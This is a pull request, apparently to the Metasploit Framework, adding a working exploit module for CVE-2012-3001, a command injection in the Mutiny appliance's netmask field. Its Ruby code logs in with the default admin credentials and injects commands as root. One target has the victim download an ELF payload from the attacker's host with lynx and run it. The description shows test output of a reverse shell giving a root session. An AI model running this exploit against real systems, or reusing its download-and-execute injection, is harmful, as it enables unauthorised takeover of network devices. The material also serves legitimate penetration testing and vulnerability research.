### PR TITLE
added module for cve-2012-3001

### DIFF
--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -11,6 +11,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer
+	include Msf::Exploit::EXE
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -37,21 +39,37 @@ class Metasploit3 < Msf::Exploit::Remote
 					['URL', 'http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html']
 				],
 			'Privileged'     => true,
+			'Platform'       => [ 'unix', 'linux' ],
 			'Payload'        =>
 				{
 					'DisableNops' => true,
-					'Space'       => 4000,
-					'Compat'      =>
-						{
-							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic python',
-						}
+					'Space'       => 4000
 				},
-			'Platform'       => 'unix',
-			'Arch'           => ARCH_CMD,
-			'Targets'        => [[ 'Automatic', { }]],
+			'Targets'        =>
+				[
+					[ 'Unix CMD',
+						{
+							'Arch' => ARCH_CMD,
+							'Platform' => 'unix',
+							#'Payload'        =>
+							#	{
+							#		'Compat'   =>
+							#			{
+							#				'PayloadType' => 'cmd',
+							#				'RequiredCmd' => 'python'
+							#			}
+							#	},
+						}
+					],
+					[ 'Linux Payload',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
 			'DisclosureDate' => 'Oct 22 2012',
-			'DefaultTarget' => 0))
+			'DefaultTarget' => 1))
 
 		register_options(
 			[
@@ -65,9 +83,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		"#{rhost}:#{rport}"
 	end
 
+	def lookup_lhost()
+		# Get the source address
+		if datastore['SRVHOST'] == '0.0.0.0'
+			Rex::Socket.source_address('50.50.50.50')
+		else
+			datastore['SRVHOST']
+		end
+	end
+
 	def on_new_session(session)
-		return unless @netmask_eth0
-		print_status("#{peer} - Restoring Network information")
+		cmds = []
 		cmds = [
 			%Q|echo #{@netmask_eth0} > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
 			%Q|tr -d "\\n\\r" < /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak|,
@@ -75,9 +101,76 @@ class Metasploit3 < Msf::Exploit::Remote
 			%Q|sed -e s/NETMASK=.*/NETMASK=#{@netmask_eth0}/ ifcfg-eth0 > ifcfg-eth0.bak|,
 			%Q|mv -f ifcfg-eth0.bak ifcfg-eth0|,
 			%Q|/etc/init.d/network restart|
-		]
-		session.shell_command_token(cmds.join(" ; "))
-		print_good("#{peer} - Network information restored")
+		] unless not @netmask_eth0
+		cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/
+
+		print_status("#{peer} - Restoring Network Information and Cleanup...")
+		begin
+			session.shell_command_token(cmds.join(" ; "))
+		rescue
+			print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:")
+			cmds.each { |cmd|
+				print_warning(cmd)
+			}
+		end
+		print_good("#{peer} - Restoring and Cleanup successful")
+	end
+
+	def start_web_service
+		print_status("#{peer} - Setting up the Web Service...")
+
+		if datastore['SSL']
+			ssl_restore = true
+			datastore['SSL'] = false
+		end
+
+		resource_uri = '/' + @elfname + '.elf'
+		service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
+
+		print_status("#{peer} - Starting up our web service on #{service_url} ...")
+		start_service({'Uri' => {
+			'Proc' => Proc.new { |cli, req|
+				on_request_uri(cli, req)
+			},
+			'Path' => resource_uri
+		}})
+		datastore['SSL'] = true if ssl_restore
+
+		return service_url
+	end
+
+	# wait for the data to be sent
+	def wait_linux_payload
+		print_status("#{peer} - Waiting for the victim to request the ELF payload...")
+
+		waited = 0
+		while (not @elf_sent)
+			select(nil, nil, nil, 1)
+			waited += 1
+			if (waited > datastore['HTTP_DELAY'])
+				fail_with(Exploit::Failure::Unknown, "Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+			end
+		end
+
+		#print_status("#{peer} - Giving time to the payload to execute...")
+		#select(nil, nil, nil, 20) unless session_created?
+
+		print_status("#{peer} - Shutting down the web service...")
+		stop_service
+	end
+
+	# Handle incoming requests from the target
+	def on_request_uri(cli, request)
+		vprint_status("#{peer} - on_request_uri called, #{request} requested")
+
+		if (not @elf_data)
+			print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!")
+			return
+		end
+
+		print_good("#{peer} - Sending the ELF payload to the target...")
+		@elf_sent = true
+		send_response(cli, @elf_data)
 	end
 
 	def check
@@ -135,8 +228,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		print_status("#{peer} - Exploiting Command Injection...")
-		injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
-		injection << "; #{payload.encoded}"
+
+		if target.name =~ /CMD/
+			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
+			injection << "; #{payload.encoded}"
+		else
+			print_status("#{peer} - Generating the ELF Payload...")
+			@elf_data = generate_payload_exe
+			@elfname = Rex::Text.rand_text_alpha(3+rand(3))
+			service_url = start_web_service
+			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
+			injection << "; lynx -source \"#{service_url}\" > /tmp/#{@elfname}.elf"
+			injection << "; chmod +x /tmp/#{@elfname}.elf"
+			injection << "; /tmp/#{@elfname}.elf"
+
+		end
+
 		send_request_cgi({
 			'method'    => 'POST',
 			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
@@ -151,7 +258,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				"staticRouteNetmask" => static_route_netmask || rand_text_alpha(5 + rand(3)),
 				"staticRouteGateway" => static_route_gateway || rand_text_alpha(5 + rand(3))
 			}
-		})
+		}, 1)
+
+		if target.name =~ /Linux Payload/
+			wait_linux_payload
+		end
 	end
+
+
 
 end

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -227,8 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_error("#{peer} - Error leaking information, trying to exploit with random values")
 		end
 
-		print_status("#{peer} - Exploiting Command Injection...")
-
 		if target.name =~ /CMD/
 			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
 			injection << "; #{payload.encoded}"
@@ -243,6 +241,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			injection << "; /tmp/#{@elfname}.elf"
 
 		end
+
+		print_status("#{peer} - Exploiting Command Injection...")
 
 		send_request_cgi({
 			'method'    => 'POST',

--- a/modules/exploits/unix/webapp/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/unix/webapp/mutiny_subnetmask_exec.rb
@@ -1,0 +1,157 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Mutiny Remote Command Execution',
+			'Description'    => %q{
+					This module exploits an authenticated command injection vulnerability in the
+				Mutiny appliance. Versions prior to 4.5-1.12 are vulnerable. In order to exploit
+				the vulnerability the mutiny user must have access to the admin interface. The
+				injected commands are executed with root privileges. This module has been tested
+				successfully on Mutiny 4.2-1.05.
+			},
+			'Author'         =>
+				[
+					'Christopher Campbell', # Vulnerability discovery
+					'juan vazquez'          # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2012-3001'],
+					['OSVDB', '86570'],
+					['BID', '56165'],
+					['US-CERT-VU', '841851'],
+					['URL', 'http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html']
+				],
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 4000,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic python',
+						}
+				},
+			'Platform'       => 'unix',
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Oct 22 2012',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, 'The base path to Mutiny', '/interface/' ]),
+				OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
+				OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'mutiny' ])
+			], self.class)
+	end
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+	def on_new_session(session)
+		return unless @netmask_eth0
+		print_status("#{peer} - Restoring Network information")
+		cmds = [
+			%Q|echo #{@netmask_eth0} > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
+			%Q|tr -d "\\n\\r" < /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak|,
+			%Q|mv -f /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
+			%Q|sed -e s/NETMASK=.*/NETMASK=#{@netmask_eth0}/ ifcfg-eth0 > ifcfg-eth0.bak|,
+			%Q|mv -f ifcfg-eth0.bak ifcfg-eth0|,
+			%Q|/etc/init.d/network restart|
+		]
+		session.shell_command_token(cmds.join(" ; "))
+		print_good("#{peer} - Network information restored")
+	end
+
+	def check
+		res = send_request_cgi({
+			'uri' => normalize_uri(target_uri.path, 'logon.jsp'),
+		})
+
+		if res and res.body =~ /: Mutiny : Login @ mutiny/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+
+		print_status("#{peer} - Login with the provided credentials...")
+
+		res = send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => normalize_uri(target_uri.path, 'logon.do'),
+			'vars_post' =>
+			{
+				'username' => datastore['USERNAME'],
+				'password' => datastore['PASSWORD']
+			}
+		})
+
+		if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+			print_good("#{peer} - Login successful")
+			session = $1
+		else
+			fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to login in Mutiny")
+		end
+
+		print_status("#{peer} - Leaking current Network Information...")
+
+		res = send_request_cgi({
+			'method'    => 'GET',
+			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
+			'cookie'    => "JSESSIONID=#{session}",
+		})
+
+		if res and res.code == 200 and res.body =~ /Ethernet Interfaces/
+			adress_eth0 = (res.body =~ /<input type="text" value="(.*)" name="addresseth0" class="textInput" \/>/ ? $1 : "")
+			@netmask_eth0 = (res.body =~ /<input type="text" value="(.*)" name="netmasketh0" class="textInput" \/>/ ? $1 : "")
+			gateway = (res.body =~ /<input type="text" name="Gateway" value= "(.*)" class="textInput">/ ? $1 : "")
+			dns_address = (res.body =~ /<input type="text" value="(.*)" name="dnsaddress0" class="textInput">/ ? $1 : "")
+			static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "")
+			static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "")
+			static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "")
+			print_good("#{peer} - Information leaked successfully")
+		else
+			print_error("#{peer} - Error leaking information, trying to exploit with random values")
+		end
+
+		print_status("#{peer} - Exploiting Command Injection...")
+		injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
+		injection << "; #{payload.encoded}"
+		send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
+			'cookie'    => "JSESSIONID=#{session}",
+			'vars_post' =>
+			{
+				"addresseth0" => adress_eth0 || rand_text_alpha(5 + rand(3)),
+				"netmasketh0" => injection,
+				"Gateway" => gateway || rand_text_alpha(5 + rand(3)),
+				"dnsaddress0" => dns_address || rand_text_alpha(5 + rand(3)),
+				"staticRouteAddress" => static_route_address || rand_text_alpha(5 + rand(3)),
+				"staticRouteNetmask" => static_route_netmask || rand_text_alpha(5 + rand(3)),
+				"staticRouteGateway" => static_route_gateway || rand_text_alpha(5 + rand(3))
+			}
+		})
+	end
+
+end


### PR DESCRIPTION
Tested successfully with Mutiny 4.2-1.05 as distributed on the vendor page:

http://www.mutiny.com/support/downloads/Mutiny-Build-CD-4.2-1.05.iso

Notes:
- The python payload is the more stable in this case, since others (perl and bash) are executed multiple times after injection, which is annoying. Since python is installed by default in the mutiny appliance sounds like a good option for me.
- The exploitation modifies network parameters (mainly the netmask), because of this the exploit tries to leak the original parameters and restores the original network configuration after exploitation.

Test results:

```
msf  exploit(mutiny_subnetmask_exec) > show options

Module options (exploit/unix/webapp/mutiny_subnetmask_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   mutiny           yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.177    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /interface/      yes       The base path to Mutiny
   USERNAME   admin            yes       The user to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
[+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.177:40294) at 2013-03-07 14:19:39 +0100
[*] 192.168.1.177:80 - Restoring Network information
[+] 192.168.1.177:80 - Network information restored

bash: no job control in this shell
[root@mutiny-unknown network-scripts]# 1901772573
vycrgtyayFoxCpkHpOhvWdHTBrhiyHQW
[root@mutiny-unknown network-scripts]# [root@mutiny-unknown network-scripts]# Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
AlAeyCxLgWGvROEByrhXlZpIUMuaacki
[root@mutiny-unknown network-scripts]# id
uid=0(root) gid=0(root)
[root@mutiny-unknown network-scripts]# uname -a
Linux mutiny-unknown 2.6.15-1.1833_FC4smp #1 SMP Wed Mar 1 23:56:51 EST 2006 i686 i686 i386 GNU/Linux
[root@mutiny-unknown network-scripts]# exit
exit

[*] 192.168.1.177 - Command shell session 2 closed.  Reason: Died from EOFError
^C
Abort session 2? [y/N]  y
msf  exploit(mutiny_subnetmask_exec) > 

```
